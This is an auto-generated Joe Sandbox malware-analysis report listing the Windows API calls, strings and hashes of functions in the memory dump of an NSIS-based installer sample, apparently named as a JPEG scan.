Part of subcall function 0040566A: GetDlgItemTextA.USER32(?,?,00000400,00404657), ref: 0040567D

Part of subcall function 004061D4: CharNextA.USER32(?,*?|<>/":,00000000,00429000,75953410,0042A400,00000000,004031B1,0042A400,0042A400,004033E8,?,00000006,00000008,0000000A), ref: 0040622C
Part of subcall function 004061D4: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406239
Part of subcall function 004061D4: CharNextA.USER32(?,00429000,75953410,0042A400,00000000,004031B1,0042A400,0042A400,004033E8,?,00000006,00000008,0000000A), ref: 0040623E
Part of subcall function 004061D4: CharPrevA.USER32(?,?,75953410,0042A400,00000000,004031B1,0042A400,0042A400,004033E8,?,00000006,00000008,0000000A), ref: 0040624E

GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 004046DE
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046F9

Part of subcall function 00404852: lstrlenA.KERNEL32(0041FD08,0041FD08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040476D,000000DF,00000000,00000400,?), ref: 004048F0
Part of subcall function 00404852: wsprintfA.USER32 ref: 004048F8
Part of subcall function 00404852: SetDlgItemTextA.USER32(?,0041FD08), ref: 0040490B

Strings

A, xrefs: 004045BE

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: 98fa1f5753ac6d52d71c554bedecad8f06ba05873235280509391dd3d3ccc75b
Instruction ID: 64b5da15ede57aab044e7fe1d22d086372aa44ea1ea65b7a694081baf4ac5fa5
Opcode Fuzzy Hash: 98fa1f5753ac6d52d71c554bedecad8f06ba05873235280509391dd3d3ccc75b
Instruction Fuzzy Hash: 09A1A0B1900209ABDB11AFA5CC41AEFB7B8EF85314F14843BF611B72D1D77C8A418B69

Function 00402D63 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402D74
GetModuleFileNameA.KERNEL32(00000000,0042AC00,00000400), ref: 00402D90

Part of subcall function 00405B03: GetFileAttributesA.KERNEL32(00000003,00402DA3,0042AC00,80000000,00000003), ref: 00405B07
Part of subcall function 00405B03: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B29

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,00429C00,00429C00,0042AC00,0042AC00,80000000,00000003), ref: 00402DDC

Strings

Error launching installer, xrefs: 00402DB3
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
Null, xrefs: 00402E5A
soft, xrefs: 00402E51
Inst, xrefs: 00402E48

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-1074636621
Opcode ID: 1397dd72d6c115af7393f493c685ca3f8ebbcff4dac0a2af7d9ad0e79a19b9bb
Instruction ID: 2e32d7aad0b4ca297083aa7498b96cb894cc3d31802a5233eda7db803f364c93
Opcode Fuzzy Hash: 1397dd72d6c115af7393f493c685ca3f8ebbcff4dac0a2af7d9ad0e79a19b9bb
Instruction Fuzzy Hash: CB51D6B1900215ABDB219F65DE89B9F7AB8EB04365F10403BF904B62D1C7BC9E418B9D

Function 00405F8C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 199stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(004226A0,00000400), ref: 004060B7
GetWindowsDirectoryA.KERNEL32(004226A0,00000400,?,0041F4E8,00000000,004050C9,0041F4E8,00000000), ref: 004060CA
SHGetSpecialFolderLocation.SHELL32(004050C9,00000000,?,0041F4E8,00000000,004050C9,0041F4E8,00000000), ref: 00406106
SHGetPathFromIDListA.SHELL32(00000000,004226A0), ref: 00406114
CoTaskMemFree.OLE32(00000000), ref: 00406120
lstrcatA.KERNEL32(004226A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406144
lstrlenA.KERNEL32(004226A0,?,0041F4E8,00000000,004050C9,0041F4E8,00000000,00000000,?,00000000), ref: 00406196

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406086
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040613E

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-730719616
Opcode ID: f8d53bdbd7d90d0ac424fe35c9312c39a263f382fe6c970e16e7b095edef69a6
Instruction ID: 60a0f59e8b6b1cd7b12ffa89f816090d794fd0a29963f433d7893304f5ec962b
Opcode Fuzzy Hash: f8d53bdbd7d90d0ac424fe35c9312c39a263f382fe6c970e16e7b095edef69a6
Instruction Fuzzy Hash: 9D61F171A00111AEDF219F24CC95BBB3BA5DB45300F16813BE943BA2D2C23C49A2CB5E

Function 00404070 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 0040408D
GetSysColor.USER32(00000000), ref: 004040CB
SetTextColor.GDI32(?,00000000), ref: 004040D7
SetBkMode.GDI32(?,?), ref: 004040E3
GetSysColor.USER32(?), ref: 004040F6
SetBkColor.GDI32(?,?), ref: 00404106
DeleteObject.GDI32(?), ref: 00404120
CreateBrushIndirect.GDI32(?), ref: 0040412A

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: c86d0c104538bc307405f6e360d8371e1c040facf7e5af7d22035c6604205aa7
Instruction ID: dc807fd0e826fa60b9ec6720df696095df3ef071cd79e71149a0dd006d979902
Opcode Fuzzy Hash: c86d0c104538bc307405f6e360d8371e1c040facf7e5af7d22035c6604205aa7
Instruction Fuzzy Hash: D021B2709047059BCB309F28DC48A4BBBF8AF81715F048A2AFA96B62E0C334E844CB55

Function 00405091 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0041F4E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000,?), ref: 004050CA
lstrlenA.KERNEL32(004030CC,0041F4E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000), ref: 004050DA
lstrcatA.KERNEL32(0041F4E8,004030CC,004030CC,0041F4E8,00000000,?,00000000), ref: 004050ED
SetWindowTextA.USER32(0041F4E8,0041F4E8), ref: 004050FF
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405125
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513F
SendMessageA.USER32(?,00001013,?,00000000), ref: 0040514D

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: fd1d901a3d66b42ab7b479128d65197b665bfaef9a3b2fba7657848ce050d806
Instruction ID: f15a229f4800e2d3be0f1ca7c95b874ac348c5f245d1a9f1eaef2b17b8141df3
Opcode Fuzzy Hash: fd1d901a3d66b42ab7b479128d65197b665bfaef9a3b2fba7657848ce050d806
Instruction Fuzzy Hash: 67217A71E00518BADF119FA5CD84ADFBFA9EB05354F14807AF904AA291C6789E418FA8

Function 0040495C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404977
GetMessagePos.USER32 ref: 0040497F
ScreenToClient.USER32(?,?), ref: 00404999
SendMessageA.USER32(?,00001111,00000000,?), ref: 004049AB
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049D1

Strings

f, xrefs: 004049AD

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: 064635845699c0f4496499246dda67b20ede28c923f9f6f9e3dc5f389f782763
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: 38015271D00219BADB01DBA4DD85BFFBBBCAF55711F10412BBA10B61C0D7B469018BA5

Function 00402C7C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
MulDiv.KERNEL32(?,00000064,?), ref: 00402CC2
wsprintfA.USER32 ref: 00402CD2
SetWindowTextA.USER32(?,?), ref: 00402CE2
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4

Strings

verifying installer: %d%%, xrefs: 00402CCC

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: d79d4c9ffce4257e89ee4afce4791c7f82385d7ff25413b105fc4450054c0f98
Instruction ID: 8c289f0fb36a9d27d262e5defce623c0a4e81db89a67886656150a2c4b5e1d8a
Opcode Fuzzy Hash: d79d4c9ffce4257e89ee4afce4791c7f82385d7ff25413b105fc4450054c0f98
Instruction Fuzzy Hash: 00014F70944208BBEF249F60DD09EEE37A9EB04704F008039FA06B92E0D7B99955CF59

Function 00405557 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(?,?,0042A400), ref: 0040559A
GetLastError.KERNEL32 ref: 004055AE
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055C3
GetLastError.KERNEL32 ref: 004055CD

Strings

ds@, xrefs: 0040558C
ts@, xrefs: 0040555D

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: ds@$ts@
API String ID: 3449924974-968229870
Opcode ID: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
Instruction ID: 3d8c07b43999b23b4b99d6b0442eda675a509ebc6c38f8f9f8ea4228a2b68225
Opcode Fuzzy Hash: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
Instruction Fuzzy Hash: 0D010871C04259EAEF019BA1CC447EFBFB9EF04354F10817AD905B6290E378A604CBAA

Function 00406294 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062AB
wsprintfA.USER32 ref: 004062E4
LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004062F8

Strings

UXTHEME, xrefs: 0040629D
%s%s.dll, xrefs: 004062DE
\, xrefs: 004062BC

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
Instruction ID: b350a7b34e5dfe1d1a07fade029f1484d0e2916aa38c44d12689a48c44b66a33
Opcode Fuzzy Hash: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
Instruction Fuzzy Hash: FAF0F63091410AAADF15AB74DC0DFFB365CAB08304F1405BAB646E11D2E6B8E9288B69

Function 0040273C Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
GlobalFree.KERNEL32(?), ref: 004027EB
GlobalFree.KERNEL32(00000000), ref: 004027FE
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 86a8ee2d16782c07209517f5dd71efb1f290e7d8bca09d8e14a1676003343f95
Instruction ID: 69dabb1dc5664d4cb3e0aedb1da4cd8560a2ff3041f204a353ec2f52c38cd3f1
Opcode Fuzzy Hash: 86a8ee2d16782c07209517f5dd71efb1f290e7d8bca09d8e14a1676003343f95
Instruction Fuzzy Hash: 7C21BF71C00128BBCF206FA5CE49D9E7A79EF04364F14423AF410762E0C7791D009FA9

Function 00402F9C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402FFA
GetTickCount.KERNEL32 ref: 0040307B
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 004030A8
wsprintfA.USER32 ref: 004030B8

Strings

... %d%%, xrefs: 004030B2

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 83f174d6043497e4207e2511ffbbbcac1c17996e36d45ce9a5b1f59eccb8449a
Instruction ID: 5f1f0f90ab52480f624b15d228fda7616e1eaa7d5f1d5864c66c4d16daa58cb3
Opcode Fuzzy Hash: 83f174d6043497e4207e2511ffbbbcac1c17996e36d45ce9a5b1f59eccb8449a
Instruction Fuzzy Hash: 69518271901219ABCF10DF65DA4469F7BB8AB08756F14413BF910BB2C0C7389E51CBAA

Function 004061D4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,00429000,75953410,0042A400,00000000,004031B1,0042A400,0042A400,004033E8,?,00000006,00000008,0000000A), ref: 0040622C
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406239
CharNextA.USER32(?,00429000,75953410,0042A400,00000000,004031B1,0042A400,0042A400,004033E8,?,00000006,00000008,0000000A), ref: 0040623E
CharPrevA.USER32(?,?,75953410,0042A400,00000000,004031B1,0042A400,0042A400,004033E8,?,00000006,00000008,0000000A), ref: 0040624E

Strings

*?|<>/":, xrefs: 0040621C

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 7d136cfff8c7bf043451e4c65a0ab86a2e72481698e5121a5e115d190c3ec359
Instruction ID: 78b5553556e1b29770c7274e4e8764cd0b55728b37568efcb800383df96c7a9c
Opcode Fuzzy Hash: 7d136cfff8c7bf043451e4c65a0ab86a2e72481698e5121a5e115d190c3ec359
Instruction Fuzzy Hash: FF11045180839029FB3226380C40BB76F994F6A760F1900BFE8D2722C2D67C5CA2976E

Function 00401759 Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(00000000,00000000,004093E8,00429800,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,004093E8,004093E8,00000000,00000000,004093E8,00429800,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405F6A: lstrcpynA.KERNEL32(?,?,00000400,004032A8,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F77

Part of subcall function 00405091: lstrlenA.KERNEL32(0041F4E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000,?), ref: 004050CA
Part of subcall function 00405091: lstrlenA.KERNEL32(004030CC,0041F4E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000), ref: 004050DA
Part of subcall function 00405091: lstrcatA.KERNEL32(0041F4E8,004030CC,004030CC,0041F4E8,00000000,?,00000000), ref: 004050ED
Part of subcall function 00405091: SetWindowTextA.USER32(0041F4E8,0041F4E8), ref: 004050FF
Part of subcall function 00405091: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405125
Part of subcall function 00405091: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513F
Part of subcall function 00405091: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040514D

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
